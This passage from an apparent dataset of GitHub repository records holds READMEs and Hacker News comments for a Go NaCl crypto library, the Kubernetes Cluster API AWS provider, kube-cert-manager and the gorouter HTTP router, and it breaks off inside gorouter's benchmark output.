Compared with the implementation in\ngolang.org/x/crypto/nacl, this library offers *all* of the API's present in\nNaCL, better compatibility with NaCL implementations written in other languages,\nas well as some utilities for generating and loading keys and nonces, and\nencrypting messages.\n\nMany of them are simple wrappers around functions or libraries available in the\nGo standard library, or in the golang.org/x/crypto package. Other code I copied\ndirectly into this library with the appropriate LICENSE; if a function is longer\nthan, say, 5 lines, I didn't write it myself. There are no dependencies outside\nof the standard library or golang.org/x/crypto.\n\nThe goal is to both show how to implement the NaCL functions in pure Go, and\nto provide interoperability between messages encrypted/hashed/authenticated in\nother languages, and available in Go.\n\nAmong other benefits, NaCL is designed to be misuse resistant and standardizes\non the use of 32 byte keys and 24 byte nonces everywhere. Several helpers are\npresent for generating keys/nonces and loading them from configuration, as well\nas for encrypting messages. You can generate a key by running `openssl rand -hex\n32` and use the helpers in your program like so:\n\n```go\nimport \"github.com/kevinburke/nacl\"\nimport \"github.com/kevinburke/nacl/secretbox\"\n\nfunc main() {\n key, err := nacl.Load(\"6368616e676520746869732070617373776f726420746f206120736563726574\")\n if err != nil {\n panic(err)\n }\n encrypted := secretbox.EasySeal([]byte(\"hello world\"), key)\n fmt.Println(base64.StdEncoding.EncodeToString(encrypted))\n}\n```\n\nThe package names match the primitives available in NaCL, with the `crypto_`\nprefix removed. Some function names have been changed to match the Go\nconventions.\n\n### Installation\n\n```\ngo get github.com/kevinburke/nacl\n```\n\nOr you can Git clone the code directly to $GOPATH/src/github.com/kevinburke/nacl.\n\n### Who am I?\n\nWhile you probably shouldn't trust random security code from the Internet,\nI'm reasonably confident that this code is secure. I did not implement any\nof the hard math (poly1305, XSalsa20, curve25519) myself - I call into\ngolang.org/x/crypto for all of those functions. I also ported over every test\nI could find from the C/C++ code, and associated RFC's, and ensured that these\nlibraries passed those tests.\n\nI'm [a contributor to the Go Standard Library and associated\ntools][contributor], and I've also been paid to do [security\nconsulting][services] for startups, and [found security problems in consumer\nsites][capital-one].\n\n[contributor]: https://go-review.googlesource.com/q/owner:kev%2540inburke.com\n[capital-one]: https://burke.services/capital-one-open-redirect.html\n[services]: https://burke.services\n\n### Errata\n\n- The implementation of `crypto_sign` uses the `ref10` implementation of ed25519\nfrom SUPERCOP, *not* the current implementation in NaCL. The difference is that\nthe entire 64-byte signature is prepended to the message; in the current version\nof NaCL, separate bits are prepended and appended to the message.\n\n- Compared with `crypto/ed25519`, this library's Sign\nimplementation returns the message along with the signature, and Verify\nexpects the first 64 bytes of the message to be the signature. This simplifies\nthe API and matches the behavior of the ref10 implementation and other NaCL\nimplementations. 
Sign also flips the order of the message and the private key:\n`Sign(message, privatekey)`, to match the NaCL implementation.\n\n- Compared with `golang.org/x/crypto/nacl/box`, `Precompute` returns the shared\nkey instead of modifying the input. In several places the code was modified to\ncall functions that now exist in `nacl`.\n\n- Compared with `golang.org/x/crypto/nacl/secretbox`, `Seal` and `Open`\ncall the `onetimeauth` package in this library, instead of calling\n`golang.org/x/crypto/poly1305` directly.\n", "readme_type": "markdown", "hn_comments": "Excellent. I am using my own pure-go lib, hacked up just to avoid hassle of binding to native code, but it supports only features I need.Thanks Kevin.Oh good. I was just about to use https://github.com/GoKillers/libsodium-go, but I'd rather not have to depend on CGO.Thanks! I've been wondering why the golang crypto repo contains only half an implementation for so long. I guess people are not generally eager to take responsibility for crypto implementations, especially semi-official ones...It would be nice if the golang devs would pick an Argon2 implementation too (Blake2 hash is already there); it always feels prudent not to use any crypto libraries lest they receive some sort of semi-official blessing from the either language's own creators or renowned cryptographers.Also interesting, this is the first package I've seen in the wild that uses Bazel.I love the README, it's very modest and I enjoy reading things like \"if a function is longer than, say, 5 lines, I didn't write it myself.\" and \"While you probably shouldn't trust random security code from the Internet, I'm reasonably confident that this code is secure. I did not implement any of the hard math (poly1305, XSalsa20, curve25519) myself - I call into golang.org/x/crypto for all of those functions. I also ported over every test I could find from the C/C++ code, and associated RFC's, and ensured that these libraries passed those tests.\"I will wait for other companies to use it first - but it looks like a very level-headed implementation that won't be hard for the author to maintain - and a very useful tool.Did a quick ctrl + F in the readme to look for how they handle timing attacks in Go. As this is a pure Go implementation, I'm curious - how are these attacks mitigated, or is that left to consumers of the library?I'm confused - does this have anything to do with Google's NaCL plug-in architecture for Chrome? Or is it only a set of crypto routines that have an unfortunate name collision with the former?Amazing work, thank you!\nLet's see if saltpack[1] will move to this at some point! :D1. https://github.com/keybase/saltpackPlease stop upvoting insider gossip like this. This is not interesting at all to anybody outside Google.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/cluster-api-provider-aws", "link": "https://github.com/kubernetes-sigs/cluster-api-provider-aws", "tags": ["k8s-sig-cluster-lifecycle", "cluster-api", "kubernetes-cluster"], "stars": 533, "description": "Kubernetes Cluster API Provider AWS provides consistent deployment and day 2 operations of \"self-managed\" and EKS Kubernetes clusters on AWS.", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Cluster API Provider AWS\n\n

\n\"Powered\n

\n

\n\n\n\n\n\n\n\n\n\n\n\n\n

\n\n------\n\nKubernetes-native declarative infrastructure for AWS.\n\n## What is the Cluster API Provider AWS\n\nThe [Cluster API][cluster_api] brings\ndeclarative, Kubernetes-style APIs to cluster creation, configuration and\nmanagement.\n\nThe API itself is shared across multiple cloud providers allowing for true AWS\nhybrid deployments of Kubernetes. It is built atop the lessons learned from\nprevious cluster managers such as [kops][kops] and\n[kubicorn][kubicorn].\n\n## Documentation\n\nPlease see our [book](https://cluster-api-aws.sigs.k8s.io) for in-depth documentation.\n\n## Launching a Kubernetes cluster on AWS\n\nCheck out the [Cluster API Quick Start](https://cluster-api.sigs.k8s.io/user/quick-start.html) for launching a\ncluster on AWS.\n\n## Features\n\n- Native Kubernetes manifests and API\n- Manages the bootstrapping of VPCs, gateways, security groups and instances.\n- Choice of Linux distribution among Amazon Linux 2, CentOS 7, Ubuntu(18.04, 20.04) and Flatcar\n using [pre-baked AMIs][published_amis].\n- Deploys Kubernetes control planes into private subnets with a separate\n bastion server.\n- Doesn't use SSH for bootstrapping nodes.\n- Installs only the minimal components to bootstrap a control plane and workers.\n- Supports control planes on EC2 instances.\n- [EKS support][eks_support]\n\n------\n\n## Compatibility with Cluster API and Kubernetes Versions\n\nThis provider's versions are compatible with the following versions of Cluster API\nand support all Kubernetes versions that is supported by its compatible Cluster API version:\n\n| | Cluster API v1alpha4 (v0.4) | Cluster API v1beta1 (v1.x) |\n| --------------------------- | :-------------------------: | :-------------------------: |\n| CAPA v1alpha4 `(v0.7)` | \u2713 | \u2613 |\n| CAPA v1beta1 `(v1.x)` | \u2613 | \u2713 |\n| CAPA v1beta2 `(v2.x, main)`| \u2613 | \u2713 |\n\n(See [Kubernetes support matrix][cluster-api-supported-v] of Cluster API versions).\n\n------\n\n## Kubernetes versions with published AMIs\n\nSee [amis] for the list of most recently published AMIs.\n\n------\n\n## clusterawsadm\n\n`clusterawsadm` CLI tool provides bootstrapping, AMI, EKS, and controller related helpers.\n\n`clusterawsadm` binaries are released with each release, can be found under [assets](https://github.com/kubernetes-sigs/cluster-api-provider-aws/releases/latest) section.\n\n`clusterawsadm` could also be installed via Homebrew on macOS and linux OS.\nInstall the latest release using homebrew:\n```shell\nbrew install clusterawsadm\n```\n\nTest to ensure the version you installed is up-to-date:\n```shell\nclusterawsadm version\n```\n\n------\n\n## Getting involved and contributing\n\nAre you interested in contributing to cluster-api-provider-aws? We, the\nmaintainers and community, would love your suggestions, contributions, and help!\nAlso, the maintainers can be contacted at any time to learn more about how to get\ninvolved.\n\nIn the interest of getting more new people involved we tag issues with\n[`good first issue`][good_first_issue].\nThese are typically issues that have smaller scope but are good ways to start\nto get acquainted with the codebase.\n\nWe also encourage ALL active community participants to act as if they are\nmaintainers, even if you don't have \"official\" write permissions. This is a\ncommunity effort, we are here to serve the Kubernetes community. If you have an\nactive interest and you want to get involved, you have real power! 
Don't assume\nthat the only people who can get things done around here are the \"maintainers\".\n\nWe also would love to add more \"official\" maintainers, so show us what you can\ndo!\n\nThis repository uses the Kubernetes bots. See a full list of the commands [here][prow].\n\n### Build the images locally\n\nIf you want to just build the CAPA containers locally, run\n\n```shell\n REGISTRY=docker.io/my-reg make docker-build\n```\n\n### Tilt-based development environment\n\nSee [development][development] section for details.\n\n### Implementer office hours\n\nMaintainers hold office hours every two weeks, with sessions open to all\ndevelopers working on this project.\n\nOffice hours are hosted on a zoom video chat every other Monday\nat 09:00 (Pacific) / 12:00 (Eastern) / 17:00 (Europe/London),\nand are published on the [Kubernetes community meetings calendar][gcal].\n\n### Other ways to communicate with the contributors\n\nPlease check in with us in the [#cluster-api-aws][slack] channel on Slack.\n\n## Github issues\n\n### Bugs\n\nIf you think you have found a bug please follow the instructions below.\n\n- Please spend a small amount of time giving due diligence to the issue tracker. Your issue might be a duplicate.\n- Get the logs from the cluster controllers. Please paste this into your issue.\n- Open a [new issue][new_issue].\n- Remember that users might be searching for your issue in the future, so please give it a meaningful title to help others.\n- Feel free to reach out to the cluster-api community on the [kubernetes slack][slack].\n\n### Tracking new features\n\nWe also use the issue tracker to track features. If you have an idea for a feature, or think you can help kops become even more awesome follow the steps below.\n\n- Open a [new issue][new_issue].\n- Remember that users might be searching for your issue in the future, so please\n give it a meaningful title to help others.\n- Clearly define the use case, using concrete examples. EG: I type `this` and\n cluster-api-provider-aws does `that`.\n- Some of our larger features will require some design. If you would like to\n include a technical design for your feature please include it in the issue.\n- After the new feature is well understood, and the design agreed upon, we can\n start coding the feature. We would love for you to code it. So please open\n up a **WIP** *(work in progress)* pull request, and happy coding.\n\n>\u201cAmazon Web Services, AWS, and the \u201cPowered by AWS\u201d logo materials are\ntrademarks of Amazon.com, Inc. 
or its affiliates in the United States\nand/or other countries.\"\n\n## Our Contributors\n\nThank you to all contributors and a special thanks to our current maintainers & reviewers:\n\n| Maintainers | Reviewers |\n|------------------------------------------------------------------| -------------------------------------------------------------------- |\n| [@richardcase](https://github.com/richardcase) (from 2020-12-04) | [@shivi28](https://github.com/shivi28) (from 2021-08-27) |\n| [@Skarlso](https://github.com/Skarlso) (from 2022-10-19) | [@dthorsen](https://github.com/dthorsen) (from 2020-12-04) |\n| [@Ankitasw](https://github.com/Ankitasw) (from 2022-10-19) | [@pydctw](https://github.com/pydctw) (from 2021-12-09) |\n| [@dlipovetsky](https://github.com/dlipovetsky) (from 2021-10-31) | [@AverageMarcus](https://github.com/AverageMarcus) (from 2022-10-19) |\n\nand the previous/emeritus maintainers & reviewers:\n\n| Emeritus Maintainers | Emeritus Reviewers |\n|------------------------------------------------------|--------------------------------------------------------|\n| [@chuckha](https://github.com/chuckha) | [@ashish-amarnath](https://github.com/ashish-amarnath) |\n| [@detiber](https://github.com/detiber) | [@davidewatson](https://github.com/davidewatson) |\n| [@ncdc](https://github.com/ncdc) | [@enxebre](https://github.com/enxebre) |\n| [@randomvariable](https://github.com/randomvariable) | [@ingvagabund](https://github.com/ingvagabund) |\n| [@rudoi](https://github.com/rudoi) | [@michaelbeaumont](https://github.com/michaelbeaumont) |\n| [@sedefsavas](https://github.com/sedefsavas) | [@sethp-nr](https://github.com/sethp-nr) |\n| [@vincepri](https://github.com/vincepri) | | \n\nAll the CAPA contributors:\n\n

[contributors image]
\n\n\n[slack]: https://kubernetes.slack.com/messages/CD6U2V71N\n[good_first_issue]: https://github.com/kubernetes-sigs/cluster-api-provider-aws/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc+label%3A%22good+first+issue%22\n[gcal]: https://calendar.google.com/calendar/embed?src=cgnt364vd8s86hr2phapfjc6uk%40group.calendar.google.com\n[prow]: https://go.k8s.io/bot-commands\n[new_issue]: https://github.com/kubernetes-sigs/cluster-api-provider-aws/issues/new\n[cluster_api]: https://github.com/kubernetes-sigs/cluster-api\n[kops]: https://github.com/kubernetes/kops\n[kubicorn]: http://kubicorn.io/\n[amis]: https://cluster-api-aws.sigs.k8s.io/topics/images/amis.html\n[published_amis]: https://cluster-api-aws.sigs.k8s.io/topics/images/built-amis.html\n[eks_support]: https://cluster-api-aws.sigs.k8s.io/topics/eks/index.html\n[cluster-api-supported-v]: https://cluster-api.sigs.k8s.io/reference/versions.html\n[development]: https://cluster-api-aws.sigs.k8s.io/development/development.html\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PalmStoneGames/kube-cert-manager", "link": "https://github.com/PalmStoneGames/kube-cert-manager", "tags": ["certificate", "kubernetes", "tls", "letsencrypt"], "stars": 533, "description": "Manage Lets Encrypt certificates for a Kubernetes cluster.", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Certificate Manager\n\n## Deprecation notice: This project is deprecated in favor of [cert-manager](https://github.com/jetstack/cert-manager)\n\nThis project is loosely based on https://github.com/kelseyhightower/kube-cert-manager\nIt took over most of its documentation, license, as well as the general approach to how things work.\n\nThe code itself however, was entirely reimplemented to use xenolf/lego as the basis, instead of reimplementing an ACME client and DNS plugins.\n\n## Version\n\nPlease note: This is the documentation for the currently in development version of kcm, please refer to [v0.4.0](https://github.com/PalmStoneGames/kube-cert-manager/tree/v0.4.0) for documentation for the latest stable version\n\n## Special note for upgrading from earlier versions\n\nIf you are upgrading from a version before 0.5.0 then note that the default way to identify Ingress resources\nto be managed by the certificate manager has changed, from the `enabled` annotation, to the `class` label.\n[Backwards compatible behaviour is available](docs/ingress.md) by setting the `-class` [argument](docs/deployment-arguments.md) to a blank value.\n\n## Features\n\n* Manage Kubernetes TLS secrets backed by Let's Encrypt issued certificates.\n* Manage [Let's Encrypt](https://letsencrypt.org) issued certificates based on Kubernetes ThirdParty Resources.\n* Manage [Let's Encrypt](https://letsencrypt.org) issued certificates based on Kubernetes Ingress Resources.\n* Domain validation using ACME HTTP-01, SNI-TLS-01 or DNS-01 challenges.\n* Support for multiple challenge providers.\n* Support for subject alternative names in requested certificates.\n\n## Project Goals\n\n* Demonstrate how to build custom Kubernetes controllers.\n* Demonstrate how to use Kubernetes [Custom Resource Definitions](https://kubernetes.io/docs/concepts/api-extension/custom-resources/).\n* Demonstrate how to interact with the Kubernetes API (watches, reconciliation, etc).\n* Demonstrate how to write great documentation for Kubernetes add-ons and extensions.\n* Promote the usage of Let's Encrypt for securing web applications running on 
Kubernetes.\n\n## Requirements\n\n* Kubernetes 1.7+\n* At least one configured [challenge provider](docs/providers.md)\n\n## Usage\n\n* [Deployment Guide](docs/deployment-guide.md)\n* [Creating a Certificate](docs/create-a-certificate.md)\n* [Deleting a Certificate](docs/delete-a-certificate.md)\n* [Consuming Certificates](docs/consume-certificates.md)\n- [Managing Certificates for Ingress Resources](docs/ingress.md)\n- [Garbage Collection of Secrets](docs/garbage-collection.md)\n* [Secure Deployment using RBAC](docs/secure-deployment.md)\n\n## Documentation\n\n* [Deployment Arguments](docs/deployment-arguments.md)\n* [Certificate Custom Resource Definitions](docs/certificate-custom-resource.md)\n* [Certificate Resources](docs/certificate-resources.md)\n* [Challenge Providers](docs/providers.md)\n* [Building Container Image with AWS CodeBuild](codebuild/README.md)\n", "readme_type": "markdown", "hn_comments": "What are the major difference between this and say kube-lego that might entice someone to switch?I'm curious what advantages and tradeoffs it has over the project that it is based upon [1] for a person choosing between them.[1]: https://github.com/kelseyhightower/kube-cert-managerBig kudos to Luna for fusing both of these awesome projects - this was actually on our backlog too and helped a lot!I've been using this project on GKE for ~2 weeks now in combination with the nginx ingress controller. \nI have it configured to use the DNS challenge to get new certs so I don't have to expose an extra port as well.It feels liberating to just get an SSL cert for any subdomain I need and have the whole process abstracted from me.I thought I wanted this for a long time, but `kube-lego` gets me very similar results... without needing to inject credentials for my DNS provider to my cluster.I'm curious if others have thoughts on this vs kube-lego. (I would agree that I like the approach of this project quite a bit more than kelseyhightower's. This feels more complete, works with far more providers, etc)Found this similar project a couple days ago: https://github.com/tazjin/kubernetes-letsencryptDoesn't seem quite as configurable but looks a bit simpler to implement.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xujiajun/gorouter", "link": "https://github.com/xujiajun/gorouter", "tags": ["go", "router", "gorouter", "restful-api", "golang"], "stars": 533, "description": "xujiajun/gorouter is a simple and fast HTTP router for Go. It is easy to build RESTful APIs and your web framework.", "lang": "Go", "repo_lang": "", "readme": "# gorouter [![GoDoc](https://godoc.org/github.com/xujiajun/gorouter?status.svg)](https://godoc.org/github.com/xujiajun/gorouter) \"Build [![Go Report Card](https://goreportcard.com/badge/github.com/xujiajun/gorouter)](https://goreportcard.com/report/github.com/xujiajun/gorouter) [![Coverage Status](https://s3.amazonaws.com/assets.coveralls.io/badges/coveralls_100.svg)](https://coveralls.io/github/xujiajun/gorouter?branch=master) [![License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)](https://raw.githubusercontent.com/xujiajun/gorouter/master/LICENSE) [![Release](https://img.shields.io/badge/release-v1.1.0-blue.svg?style=flat-square)](https://github.com/xujiajun/gorouter/releases/tag/v1.0.1) [![Awesome](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go#routers) \n`xujiajun/gorouter` is a simple and fast HTTP router for Go. 
It makes it easy to build RESTful APIs and your own web framework.\n\n## Motivation\n\nI wanted a simple and fast HTTP Go router that supports regexp. I prefer regexp support because, without it, the router needs extra logic to check URL parameter types, which increases program complexity. So I did some searching on GitHub and found the wonderful `julienschmidt/httprouter`: it is very fast, but unfortunately it does not support regexp. Later I found `gorilla/mux`: it is powerful as well, but my benchmark showed it to be somewhat slow. So I set out to develop a new router that supports regexp and is still fast, and named it `xujiajun/gorouter`. By the way, this is my first Go open source project. It may be the fastest Go HTTP router that supports regexp; for performance details, please refer to the latest [Benchmarks](#benchmarks).\n\n## Features\n\n* Fast - see [Benchmarks](#benchmarks)\n* [URL parameters](#url-parameters)\n* [Regex parameters](#regex-parameters)\n* [Routes groups](#routes-groups)\n* [Reverse Routing](#reverse-routing)\n* [Custom NotFoundHandler](#custom-notfoundhandler)\n* [Custom PanicHandler](#custom-panichandler)\n* [Middleware Chain Support](#middlewares-chain)\n* [Serve Static Files](#serve-static-files)\n* [Familiar Pattern Rules](#pattern-rule)\n* HTTP methods GET, POST, DELETE, PUT and PATCH supported\n* No external dependencies (just Go stdlib)\n\n\n## Requirements\n\n* golang 1.8+\n\n## Installation\n\n```\ngo get -u github.com/xujiajun/gorouter\n```\n\n## Usage\n\n### Static routes\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n\n```\n\n### URL Parameters\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\t//url parameters match\n\tmux.GET(\"/user/:id\", func(w http.ResponseWriter, r *http.Request) {\n\t\t//get one URL parameter\n\t\tid := gorouter.GetParam(r, \"id\")\n\t\t//get all URL parameters\n\t\t//id := gorouter.GetAllParams(r)\n\t\t//fmt.Println(id)\n\t\tw.Write([]byte(\"match user/:id ! 
get id:\" + id))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Regex Parameters\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\t//url regex match\n\tmux.GET(\"/user/{id:[0-9]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"match user/{id:[0-9]+} !\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n\n### Routes Groups\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc usersHandler(w http.ResponseWriter, r *http.Request) {\n\tfmt.Fprint(w, \"/api/users\")\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.Group(\"/api\").GET(\"/users\", usersHandler)\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Reverse Routing\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\n\trouteName1 := \"user_event\"\n\tmux.GETAndName(\"/users/:user/events\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"/users/:user/events\"))\n\t}, routeName1)\n\n\trouteName2 := \"repos_owner\"\n\tmux.GETAndName(\"/repos/{owner:\\\\w+}/{repo:\\\\w+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"/repos/{owner:\\\\w+}/{repo:\\\\w+}\"))\n\t}, routeName2)\n\n\tparams := make(map[string]string)\n\tparams[\"user\"] = \"xujiajun\"\n\tfmt.Println(mux.Generate(http.MethodGet, routeName1, params)) // /users/xujiajun/events \n\n\tparams = make(map[string]string)\n\tparams[\"owner\"] = \"xujiajun\"\n\tparams[\"repo\"] = \"xujiajun_repo\"\n\tfmt.Println(mux.Generate(http.MethodGet, routeName2, params)) // /repos/xujiajun/xujiajun_repo \n}\n\n```\n\n### Custom NotFoundHandler\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc notFoundFunc(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(http.StatusNotFound)\n\tfmt.Fprint(w, \"404 page !!!\")\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.NotFoundFunc(notFoundFunc)\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Custom PanicHandler\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.PanicHandler = func(w http.ResponseWriter, req *http.Request, err interface{}) {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tfmt.Println(\"err from recover is :\", err)\n\t\tfmt.Fprint(w, \"received a panic\")\n\t}\n\tmux.GET(\"/panic\", func(w http.ResponseWriter, r *http.Request) {\n\t\tpanic(\"panic\")\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n\n```\n\n### Middlewares Chain\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\ntype statusRecorder struct {\n\thttp.ResponseWriter\n\tstatus int\n}\n\nfunc (rec *statusRecorder) WriteHeader(code int) {\n\trec.status = code\n\trec.ResponseWriter.WriteHeader(code)\n}\n\n//https://upgear.io/blog/golang-tip-wrapping-http-response-writer-for-middleware/\nfunc withStatusRecord(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\trec := statusRecorder{w, 
http.StatusOK}\n\t\tnext.ServeHTTP(&rec, r)\n\t\tlog.Printf(\"response status: %v\\n\", rec.status)\n\t}\n}\n\nfunc notFoundFunc(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(http.StatusNotFound)\n\tfmt.Fprint(w, \"Not found page !\")\n}\n\nfunc withLogging(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tlog.Printf(\"Logged connection from %s\", r.RemoteAddr)\n\t\tnext.ServeHTTP(w, r)\n\t}\n}\n\nfunc withTracing(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tlog.Printf(\"Tracing request for %s\", r.RequestURI)\n\t\tnext.ServeHTTP(w, r)\n\t}\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.NotFoundFunc(notFoundFunc)\n\tmux.Use(withLogging, withTracing, withStatusRecord)\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n## Serve static files\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\t\"os\"\n\t\n\t\"github.com/xujiajun/gorouter\"\n)\n\n//ServeFiles serve static resources\nfunc ServeFiles(w http.ResponseWriter, r *http.Request) {\n\twd, err := os.Getwd()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdir := wd + \"/examples/serveStaticFiles/files\"\n\thttp.StripPrefix(\"/files/\", http.FileServer(http.Dir(dir))).ServeHTTP(w, r)\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.GET(\"/hi\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hi\"))\n\t})\n\t//defined prefix\n\tmux2 := mux.Group(\"/files\")\n\t//http://127.0.0.1:8181/files/demo.txt\n\t//will match\n\tmux2.GET(\"/{filename:[0-9a-zA-Z_.]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tServeFiles(w, r)\n\t})\n\n\t//http://127.0.0.1:8181/files/a/demo2.txt\n\t//http://127.0.0.1:8181/files/a/demo.txt\n\t//will match\n\tmux2.GET(\"/{fileDir:[0-9a-zA-Z_.]+}/{filename:[0-9a-zA-Z_.]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tServeFiles(w, r)\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\nDetail see [serveStaticFiles example](https://github.com/xujiajun/gorouter/blob/master/examples/serveStaticFiles/main.go)\n\n## Pattern Rule\n\nThe syntax here is modeled after [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter) and [gorilla/mux](https://github.com/gorilla/mux)\n\n| Syntax | Description | Example |\n|--------|------|-------|\n| `:name` | named parameter | /user/:name |\n| `{name:regexp}` | named with regexp parameter | /user/{name:[0-9a-zA-Z]+} |\n| `:id` | named with regexp parameter | /user/:id |\n\nAnd `:id` is short for `{id:[0-9]+}`, `:name` are short for `{name:[0-9a-zA-Z_]+}`\n\n> if use default regex checks unless you know what you're doing\n\n \n## Benchmarks\n\nthe benchmarks code for gorouter be found in the [gorouter-bench](https://github.com/xujiajun/gorouter-bench) repository.\n\n> go test -bench=.\n\n### Benchmark System:\n\n* Go Version : go1.11.2 darwin/amd64\n* OS: Mac OS X 10.13.6\n* Architecture: x86_64\n* 16 GB 2133 MHz LPDDR3\n* CPU: 3.1 GHz Intel Core i7\n\n### Tested routers:\n\n* [beego/mux](https://github.com/beego/mux)\n* [go-zoo/bone](https://github.com/go-zoo/bone)\n* [go-chi/chi](https://github.com/go-chi/chi)\n* [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter)\n* [gorilla/mux](https://github.com/gorilla/mux)\n* [trie-mux/mux](https://github.com/teambition/trie-mux)\n* 
[xujiajun/gorouter](https://github.com/xujiajun/gorouter)\n\n\nThanks the author of httprouter: [@julienschmidt](https://github.com/julienschmidt) give me advise about benchmark [issues/24](https://github.com/xujiajun/gorouter/issues/24)\n\n## Result:\n\nGiven some routing matching syntax differences, divide GithubAPI into two groups\uff1a\n\n### Using GithubAPI Result\uff1a\n\n```\nBenchmarkBeegoMuxRouterWithGithubAPI-8 \t 10000\t 142398 ns/op\t 134752 B/op\t 1038 allocs/op\nBenchmarkBoneRouterWithGithubAPI-8 \t 1000\t 2104486 ns/op\t 720160 B/op\t 8620 allocs/op\nBenchmarkTrieMuxRouterWithGithubAPI-8 \t 20000\t 80845 ns/op\t 65856 B/op\t 537 allocs/op\nBenchmarkHttpRouterWithGithubAPI-8 \t 50000\t 30169 ns/op\t 13792 B/op\t 167 allocs/op\nBenchmarkGoRouter1WithGithubAPI-8 \t 30000\t 57793 ns/op\t 13832 B/op\t 406 allocs/op\n\n```\n### Using GithubAPI2 Result\uff1a\n\n```\nBenchmarkGoRouter2WithGithubAPI2-8 \t 30000\t 57613 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkChiRouterWithGithubAPI2-8 \t 10000\t 143224 ns/op\t 104436 B/op\t 1110 allocs/op\nBenchmarkMuxRouterWithGithubAPI2-8 \t 300\t 4450731 ns/op\t 61463 B/op\t 995 allocs/op\n```\n\n### All togther Result\uff1a\n\n```\n\u279c gorouter git:(master) go test -bench=.\nGithubAPI Routes: 203\nGithubAPI2 Routes: 203\n BeegoMuxRouter: 111072 Bytes\n BoneRouter: 100992 Bytes\n ChiRouter: 71512 Bytes\n HttpRouter: 37016 Bytes\n trie-mux: 131128 Bytes\n MuxRouter: 1378496 Bytes\n GoRouter1: 83824 Bytes\n GoRouter2: 85584 Bytes\ngoos: darwin\ngoarch: amd64\npkg: github.com/xujiajun/gorouter\nBenchmarkBeegoMuxRouterWithGithubAPI-8 \t 10000\t 142398 ns/op\t 134752 B/op\t 1038 allocs/op\nBenchmarkBoneRouterWithGithubAPI-8 \t 1000\t 2104486 ns/op\t 720160 B/op\t 8620 allocs/op\nBenchmarkTrieMuxRouterWithGithubAPI-8 \t 20000\t 80845 ns/op\t 65856 B/op\t 537 allocs/op\nBenchmarkHttpRouterWithGithubAPI-8 \t 50000\t 30169 ns/op\t 13792 B/op\t 167 allocs/op\nBenchmarkGoRouter1WithGithubAPI-8 